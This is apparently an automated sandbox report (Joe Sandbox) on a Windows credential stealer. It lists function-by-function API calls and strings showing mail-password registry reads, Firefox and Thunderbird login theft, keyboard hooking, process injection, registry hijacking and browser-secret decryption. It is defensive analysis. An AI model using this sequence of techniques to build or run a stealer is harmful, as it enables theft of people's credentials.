                                                  • Part of subcall function 00403261: lstrlenW.KERNEL32(770113FB,00403646,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403268
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                                • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                                • API String ID: 6593746-2537589853
                                                • Opcode ID: 801c566ebeef0547d1617bb57438461c15721e38146de127d13739bd89695592
                                                • Instruction ID: 2b1db3b11cb7e59929a58ba4cea4362bf6e67b79cf15a766c9744ae1d48fa6e2
                                                • Opcode Fuzzy Hash: 801c566ebeef0547d1617bb57438461c15721e38146de127d13739bd89695592
                                                • Instruction Fuzzy Hash: 8BA131B295025DBADB25EAA1CD46FDF737CAF14744F1001BAF605F21C0E678AB448B68
                                                Function 004130B3 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 119filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                • LoadResource.KERNEL32(00000000,?,00000000), ref: 004130EE
                                                • SizeofResource.KERNEL32(00000000,?), ref: 004130FA
                                                • LockResource.KERNEL32(00000000), ref: 00413104
                                                • GetTempPathA.KERNEL32(00000400,?), ref: 0041313E
                                                • lstrcatA.KERNEL32(?,find.exe), ref: 00413152
                                                • GetTempPathA.KERNEL32(00000400,?), ref: 00413160
                                                • lstrcatA.KERNEL32(?,find.db), ref: 0041316E
                                                • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 00413189
                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041319B
                                                • CloseHandle.KERNEL32(00000000), ref: 004131A2
                                                • wsprintfA.USER32 ref: 004131D2
                                                • ShellExecuteExA.SHELL32(0000003C), ref: 00413220
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                                • String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
                                                • API String ID: 2504251837-265381321
                                                • Opcode ID: bccad047b4795f28292097b304ffd35b373fc86be8b8292526a0d2f8d1d4e484
                                                • Instruction ID: 327683ff76c92dcac9dc587a200830401a566031ee9550ea718045f46c5199e2
                                                • Opcode Fuzzy Hash: bccad047b4795f28292097b304ffd35b373fc86be8b8292526a0d2f8d1d4e484
                                                • Instruction Fuzzy Hash: 44410CB1900219ABDB10DFA5DD88FDEBBBCEF89304F1041A6F609A7150D7745A858FA8
                                                Function 0040AC0A Relevance: 28.4, APIs: 5, Strings: 11, Instructions: 406filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 0040C118: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040C154
                                                  • Part of subcall function 0040C118: lstrcatW.KERNEL32(?,thunderbird.exe,?,00000104,00000000), ref: 0040C162
                                                  • Part of subcall function 0040C118: RegOpenKeyExW.ADVAPI32 ref: 0040C17B
                                                  • Part of subcall function 0040C118: RegQueryValueExW.ADVAPI32(0040A729,Path,00000000,?,?,?), ref: 0040C198
                                                  • Part of subcall function 0040C118: RegCloseKey.ADVAPI32(0040A729), ref: 0040C1A1
                                                • lstrcatW.KERNEL32(?,\firefox.exe,?), ref: 0040AC8C
                                                • GetBinaryTypeW.KERNEL32 ref: 0040AC9D
                                                • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040B11D
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00403272: wsprintfW.USER32 ref: 0040328D
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 00403554: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404E98,?), ref: 00403581
                                                  • Part of subcall function 00403554: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 004035AC
                                                • CopyFileW.KERNEL32 ref: 0040AE14
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyFileFreeOpenPrivateProfileQueryStringTypeValueVirtualwsprintf
                                                • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                                • API String ID: 288196626-815594582
                                                • Opcode ID: f5262e40be8cc69e8b595abb73622a7b73cb07ac12066b5b481e8f49edd550d3
                                                • Instruction ID: 05fef4a50751129686bd6b09da35af6691d40134a587f0c9ecca06ce14b57531
                                                • Opcode Fuzzy Hash: f5262e40be8cc69e8b595abb73622a7b73cb07ac12066b5b481e8f49edd550d3
                                                • Instruction Fuzzy Hash: E5E1F771900519ABDB15EFA2CC929EEBB79AF44308F10407FA506B71D2DF386E45CB98
                                                Function 0040882F Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135windowstringfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00408840
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00408894
                                                • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 004088AE
                                                • GetLocalTime.KERNEL32(?), ref: 004088B5
                                                • wsprintfW.USER32 ref: 004088E9
                                                • lstrcatW.KERNEL32(-00000010,?), ref: 00408900
                                                • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 0040892C
                                                • CloseHandle.KERNEL32(00000000), ref: 0040893C
                                                  • Part of subcall function 00411E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00411E4E
                                                  • Part of subcall function 00411E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041349D), ref: 00411E61
                                                  • Part of subcall function 00411E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00411E72
                                                  • Part of subcall function 00411E21: CloseHandle.KERNEL32(00000000), ref: 00411E7F
                                                  • Part of subcall function 004109D2: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,7571826E,00000000,?,?,?,?,0040895D), ref: 004109FE
                                                • GetMessageA.USER32 ref: 004089AF
                                                  • Part of subcall function 00410969: lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2
                                                • TranslateMessage.USER32(?), ref: 00408996
                                                • DispatchMessageA.USER32(?), ref: 004089A1
                                                Strings
                                                • c:\windows\system32\user32.dll, xrefs: 0040894A
                                                • SetWindowsHookExA, xrefs: 00408962
                                                • \Microsoft Vision\, xrefs: 004088A8
                                                • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 004088E3
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$HandleMessage$CloseCreatelstrcat$AllocDispatchFolderLocalModulePathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                                • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                                • API String ID: 1431388325-3884914687
                                                • Opcode ID: 21000fef18c77bbe8f9f3ed80c3c16b1e6839ebad9f605703ae49d8cc5961607
                                                • Instruction ID: bcb2bfc3d6f08f0c6dbbce81191954197df52cc67be7935f17862baf64c08a83
                                                • Opcode Fuzzy Hash: 21000fef18c77bbe8f9f3ed80c3c16b1e6839ebad9f605703ae49d8cc5961607
                                                • Instruction Fuzzy Hash: CF41A3B1500200ABD710EBAAEC49EAB77ECFBC9704F00492EF589E3191DA79D954C779
                                                Function 0040A6C8 Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 404COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 0040C118: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040C154
                                                  • Part of subcall function 0040C118: lstrcatW.KERNEL32(?,thunderbird.exe,?,00000104,00000000), ref: 0040C162
                                                  • Part of subcall function 0040C118: RegOpenKeyExW.ADVAPI32 ref: 0040C17B
                                                  • Part of subcall function 0040C118: RegQueryValueExW.ADVAPI32(0040A729,Path,00000000,?,?,?), ref: 0040C198
                                                  • Part of subcall function 0040C118: RegCloseKey.ADVAPI32(0040A729), ref: 0040C1A1
                                                • GetBinaryTypeW.KERNEL32 ref: 0040A747
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 0040B67E: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040B6AC
                                                  • Part of subcall function 0040B67E: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B6B5
                                                  • Part of subcall function 0040B67E: PathFileExistsW.SHLWAPI(0040A760), ref: 0040B7A3
                                                • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040ABCA
                                                  • Part of subcall function 0040B67E: PathFileExistsW.SHLWAPI(0040A760), ref: 0040B7FF
                                                  • Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?,0040A760,?,00000104,00000000), ref: 0040B83E
                                                  • Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B849
                                                  • Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B854
                                                  • Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B85F
                                                  • Part of subcall function 0040B67E: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B86A
                                                  • Part of subcall function 0040B67E: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B957
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                                • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                                • API String ID: 1065485167-1863067114
                                                • Opcode ID: 7a379854fddf29bb79a55f6b784d3b39fd0509623412d8cc4beb355e8c4e79d5
                                                • Instruction ID: a21d26196978709a3597642a7ada2c1c52c329a6473edbb69f38f4505bb928d0
                                                • Opcode Fuzzy Hash: 7a379854fddf29bb79a55f6b784d3b39fd0509623412d8cc4beb355e8c4e79d5
                                                • Instruction Fuzzy Hash: 15E1FA71900118ABDB15EFA1CC929EEBB79AF44308F10407FA506B71D2DF386E45CB99
                                                Function 0040D508 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55servicesleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D517
                                                • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0040D52C
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D539
                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D546
                                                • GetLastError.KERNEL32 ref: 0040D550
                                                • Sleep.KERNEL32(000007D0), ref: 0040D562
                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D56B
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D57F
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D582
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                                • String ID: ServicesActive
                                                • API String ID: 104619213-3071072050
                                                • Opcode ID: d05a9cbfe85e54a116a3953c8a6a91fbf817429a44bb3e29defd1f6c35a07c68
                                                • Instruction ID: 6ee4da6baa7cfdb34d525d31188451f87eeb6e2bc2d3ae9bbca9d79258fcd559
                                                • Opcode Fuzzy Hash: d05a9cbfe85e54a116a3953c8a6a91fbf817429a44bb3e29defd1f6c35a07c68
                                                • Instruction Fuzzy Hash: D3018FB1B402657BD3201BA3AC4CF9B3E6DDBDAB55B114036FB06F6190DA78890486BC
                                                Function 0040DA5B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167servicestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0040DA82
                                                • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0040DAB9
                                                  • Part of subcall function 00405EFF: GetProcessHeap.KERNEL32(00000008,?,00402FA7,BZ@,?,?,004103FD,BZ@,00405D61,?,770113FB,00000000,?,00405A42,00000000), ref: 00405F02
                                                  • Part of subcall function 00405EFF: RtlAllocateHeap.NTDLL(00000000,?,004103FD,BZ@,00405D61,?,770113FB,00000000,?,00405A42,00000000), ref: 00405F09
                                                • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0040DAE2
                                                • GetLastError.KERNEL32 ref: 0040DAEC
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040DAFA
                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0040DBBB
                                                • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0040DBFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                                • String ID: ServicesActive
                                                • API String ID: 899334174-3071072050
                                                • Opcode ID: ee0bd199ffc9b78794a16c9cadf91ec84f2f970ef24d8d479f882cb9df4bde89
                                                • Instruction ID: e0d4839209ff9da016ff79895746b5e9208baf0a1d30bcf04ae5e2d65b817fac
                                                • Opcode Fuzzy Hash: ee0bd199ffc9b78794a16c9cadf91ec84f2f970ef24d8d479f882cb9df4bde89
                                                • Instruction Fuzzy Hash: D1514B71D00219ABDB15EFE1C895BEFBBB8EF58305F11007AE501B62D1EB786A44CB58
                                                Function 004079E8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97injectionmemorythreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 00407A16
                                                  • Part of subcall function 00408617: GetCurrentProcess.KERNEL32(00419698,00407A03,?,?,?,?), ref: 0040861C
                                                  • Part of subcall function 00408617: IsWow64Process.KERNEL32(00000000), ref: 00408623
                                                  • Part of subcall function 00408617: GetProcessHeap.KERNEL32 ref: 00408629
                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 00407A3A
                                                • VirtualProtectEx.KERNEL32 ref: 00407A5B
                                                • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407A73
                                                • WriteProcessMemory.KERNEL32 ref: 00407A9D
                                                • WriteProcessMemory.KERNEL32 ref: 00407AC5
                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407ADD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
                                                • String ID: XXXXXX
                                                • API String ID: 813767414-582547948
                                                • Opcode ID: f7980d72101ab79f02ff7da8c08f67de9c543138a2a8b102055740c08b7c63f5
                                                • Instruction ID: 09d1d6ce863853a094a956b362c231d8e2a32404ad851e20ffbd9e8c1043e28b
                                                • Opcode Fuzzy Hash: f7980d72101ab79f02ff7da8c08f67de9c543138a2a8b102055740c08b7c63f5
                                                • Instruction Fuzzy Hash: 88219175A05215BEEB2197A19C05FFF7A6C9B45714F20413AF610F01D0DBB8AA008A7E
                                                Function 00409DF6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFullPathNameA.KERNEL32(004196A8,00000104,?,00000000), ref: 00409E17
                                                • PathCombineA.SHLWAPI(?,?,00415F88), ref: 00409E36
                                                • FindFirstFileA.KERNEL32(?,?), ref: 00409E46
                                                • PathCombineA.SHLWAPI(?,004196A8,0000002E), ref: 00409E7D
                                                • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 00409E8C
                                                  • Part of subcall function 00409ADF: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409AFC
                                                  • Part of subcall function 00409ADF: GetLastError.KERNEL32 ref: 00409B09
                                                  • Part of subcall function 00409ADF: CloseHandle.KERNEL32(00000000), ref: 00409B10
                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00409EA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                                • String ID: .$Accounts\Account.rec0
                                                • API String ID: 3873318193-2526347284
                                                • Opcode ID: 496326a86480031c4c542591a56f492fdd8fb5a17ab89cc56a7fac79c6615577
                                                • Instruction ID: afeaf177b3496e173dad23fa2a566e02bf9300b9020c09ca96321908484f06e9
                                                • Opcode Fuzzy Hash: 496326a86480031c4c542591a56f492fdd8fb5a17ab89cc56a7fac79c6615577
                                                • Instruction Fuzzy Hash: 6F1133B2A0021C6BDB20D6A4DC89FEE776CDB45754F1045B7E609E31C1E6789E848FA4
                                                Function 00411FD8 Relevance: 13.6, APIs: 9, Instructions: 81injectionmemorythreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,770113FB,00000000), ref: 00411FEC
                                                • GetCurrentProcessId.KERNEL32 ref: 00411FF7
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF), ref: 00412015
                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040), ref: 0041203F
                                                • WriteProcessMemory.KERNEL32 ref: 00412057
                                                • VirtualProtectEx.KERNEL32 ref: 00412068
                                                • VirtualAllocEx.KERNEL32(00411FD3,00000000,00000103,00003000,00000004), ref: 0041207F
                                                • WriteProcessMemory.KERNEL32 ref: 00412095
                                                • CreateRemoteThread.KERNEL32(00411FD3,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 004120A8
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
                                                • String ID:
                                                • API String ID: 900395357-0
                                                • Opcode ID: dbfaeae53c34626b6df3b338f1a554a640ec54616581a27d093a57324d086c74
                                                • Instruction ID: e33f58f12e381fdb42d6cb918fac6b64cbe19192f0b0b3cea5e0ba23fb8f546b
                                                • Opcode Fuzzy Hash: dbfaeae53c34626b6df3b338f1a554a640ec54616581a27d093a57324d086c74
                                                • Instruction Fuzzy Hash: 9C214275640218BEF7209B52DC4BFEA7EACEB45750F204176B745AA1D0D6F06E408A68
                                                Function 0040D49C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D4AB
                                                • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0040D4C0
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4CD
                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040D4E6
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4FA
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                • String ID: ServicesActive
                                                • API String ID: 493672254-3071072050
                                                • Opcode ID: b076dd4bb542dabec2ef23a6e3b6208dcc8746790eabf743052eb9ce82fcb500
                                                • Instruction ID: b4dfdcdb63f53d079e8cfef66dcecaee7ea17a8893e7e477399f0b4007c8b79a
                                                • Opcode Fuzzy Hash: b076dd4bb542dabec2ef23a6e3b6208dcc8746790eabf743052eb9ce82fcb500
                                                • Instruction Fuzzy Hash: C8F0963260422577D6211BA79C49E9B3E6DEBCA770B154232FB16E62D0CA74D80586A8
                                                Function 004118BA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,00411B06), ref: 004118C7
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,00411B06), ref: 004118DB
                                                • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,00411B06,?), ref: 00411913
                                                • RegCloseKey.ADVAPI32(00411B06), ref: 00411920
                                                • SetLastError.KERNEL32(00000000), ref: 0041192B
                                                Strings
                                                • Software\Classes\Folder\shell\open\command, xrefs: 00411909
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                                • String ID: Software\Classes\Folder\shell\open\command
                                                • API String ID: 1473660444-2536721355
                                                • Opcode ID: aa370c4428ff2d7ca6942e7619f0a0c42fc3e650f29bba1da52834033b0b3064
                                                • Instruction ID: 1351c8bc264c3eb3db1e30f780c5af0957f61df009b839787c6251a863ec2e3f
                                                • Opcode Fuzzy Hash: aa370c4428ff2d7ca6942e7619f0a0c42fc3e650f29bba1da52834033b0b3064
                                                • Instruction Fuzzy Hash: 5B011AB1910218BADB209BA2DC49EDF7FBCEF49751F004162F605F2160E6748684CAA4
                                                Function 0040CCB4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040CA5F,?), ref: 0040CCD1
                                                • BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040CA5F,?), ref: 0040CCEA
                                                • BCryptGenerateSymmetricKey.BCRYPT(00000020,0040CA5F,00000000,00000000,?,00000020,00000000,?,0040CA5F,?), ref: 0040CCFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
                                                • String ID: AES$ChainingMode$ChainingModeGCM
                                                • API String ID: 1692524283-1213888626
                                                • Opcode ID: 8b4356a64ce3d25b02d10bebd446d6e763124582b34bcac112f35affbbc91d61
                                                • Instruction ID: 580d46d73ecae701cb98036a35daebd8e93ce6f3490be188a49db603675c50b1
                                                • Opcode Fuzzy Hash: 8b4356a64ce3d25b02d10bebd446d6e763124582b34bcac112f35affbbc91d61
                                                • Instruction Fuzzy Hash: 4CF01271341325BBDB240B5ADD49FDBBFACEF9ABA1B204037F505E2190D6B1580197E8
                                                Function 0040CF58 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040CFE0
                                                • BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040D00E
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • LocalFree.KERNEL32(?), ref: 0040D096
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HeapLocal$AllocAllocateCryptDecryptFreeProcess
                                                • String ID: 0$v1
                                                • API String ID: 4131498132-3331332043
                                                • Opcode ID: f8674e6d4f648ae3f1ad2d9a25a9f89b838022dde92f7eed016923fdca00a605
                                                • Instruction ID: 09a6af966e7f72eb312f220948923195b4676329a97454fc34815be00724ecb5
                                                • Opcode Fuzzy Hash: f8674e6d4f648ae3f1ad2d9a25a9f89b838022dde92f7eed016923fdca00a605
